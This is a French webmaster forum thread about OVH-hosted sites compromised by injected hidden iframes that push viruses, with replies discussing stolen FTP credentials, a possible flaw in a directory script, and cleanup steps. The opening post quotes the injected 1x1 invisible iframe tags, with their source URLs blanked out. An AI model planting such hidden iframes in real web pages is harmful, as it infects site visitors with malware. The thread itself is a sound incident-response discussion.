7 hebergement ovh hacké

[spidermas]

Bonjour a tous

7 de mes hebergements ovh ont été hacké

simple pose d'iframe sous <body> mais cette iframe envoie des virus

le seul point commun entre les hebergement est un script annuaire mydir present sur chaqun d'eux

quelqu'un a entendue parler d'une faille avec mydir ?

certain hebergement etant en multidomaine j'ai donc plusieurs dizaines de sites touchés.

type d'iframes rencontrées :

<iframe src=" Edit OTP " width=1 height=1 style="visibility: hidden"></iframe>
<iframe src=\"Edit OTP \" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>
<iframe src=\"Edit OTP \" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

possibilité d'un virus sur les machines ovh ?

 

[jv2759]

possibilité d'un virus sur les machines ovh ?

Pas impossible mais très peux probable.

Je te conseil de changer tes code ftp. Cela peux aussi venir de là.

 

[spidermas]

je change de suite

 

[epsilon74]

j'ai eu le meme cas sur plusieurs de mes sites, c'etait mon pc qui avait été infecté (puis recup du fichier de config de filezilla avec tout les acces ftp de mes serveurs).
donc, change tes pwd ftp et desinfecte ton pc.

 

[spidermas]

meme probleme avec iframe etc... ?

la mon 240 plan viens d'etre attaqué

te souviens tu du nom du virus ?

 

[Suede]

meme probleme avec iframe etc... ?

la mon 240 plan viens d'etre attaqué

te souviens tu du nom du virus ?

Une faille dans tes scripts? Si ton serveur est infecté, il faut aussi le nettoyer. Tu n'as pas d'autres utilisateurs ftp de créer?

 

[spidermas]

non pas d'autre utilisateur

faille je pense pas vu que sur certain hebergement je n'ai que mydir d'installé

 

[mahdivitche]

j'ai déjà passe a ce cas

et la solution qui je fait est :

*** copie les fichier vers ton pc ----> supprimer le code iframe ----> supprimer tous les données de serveur ----> transfert les donnés ---> changé les droits d'access valeur CHMOD 444 et surtout pour les fichier php

la dernière point est la plus important .

 

[spidermas]

vas y avoir du boulot

 

[L.Jee]

Ou plutôt vire tout et upload une sauvegarde, reupload pas tes fichiers vérolés

 

[spidermas]

oui je vais commencer le nettoyage

mais il est vrai que j'ai dut formater la semaine derniere mon pc a cause de plusieurs virus

rootkit et trojan

 

[Suede]

non pas d'autre utilisateur

faille je pense pas vu que sur certain hebergement je n'ai que mydir d'installé

Si ils sont sur le meme serveur, ca peut etre un probleme.
Et tu peux avoir une faille dans mydir. Tu l'as sur chaque hebergement?

 

[5_legs]

j'ai eu le meme cas sur plusieurs de mes sites, c'etait mon pc qui avait été infecté (puis recup du fichier de config de filezilla avec tout les acces ftp de mes serveurs).
donc, change tes pwd ftp et desinfecte ton pc.

Comment as-tu fait la déduction que c'était ce fichier qui avait été récupéré ?

 

[spidermas]

bon apres avoir devirussé mon pc, mis un firewall, desinfecter tt les sites des iframes et changer tout les mot de passe ftp hier...


pas d'frame se matin

pourvu que sa dure

 

[spidermas]

c'est repart se matin tout mes plans chez ovh hacké avec les meme iframes ^^

 

[Suede]

c'est repart se matin tout mes plans chez ovh hacké avec les meme iframes ^^

Qu'as tu de commun entre tous tes hebergements? Un script commun?
Est-ce que tu peux faire un reset de tes hebergements et tout recharger?

 

[kitten13]

Connecte toi en ftp sur tes comptes ensuite tu fait Ctrl +A et Ensuite Suppr

Non je plaisante, d'après ce que tu nous dit moi je pense plus à une faille commune sur ton script mydir.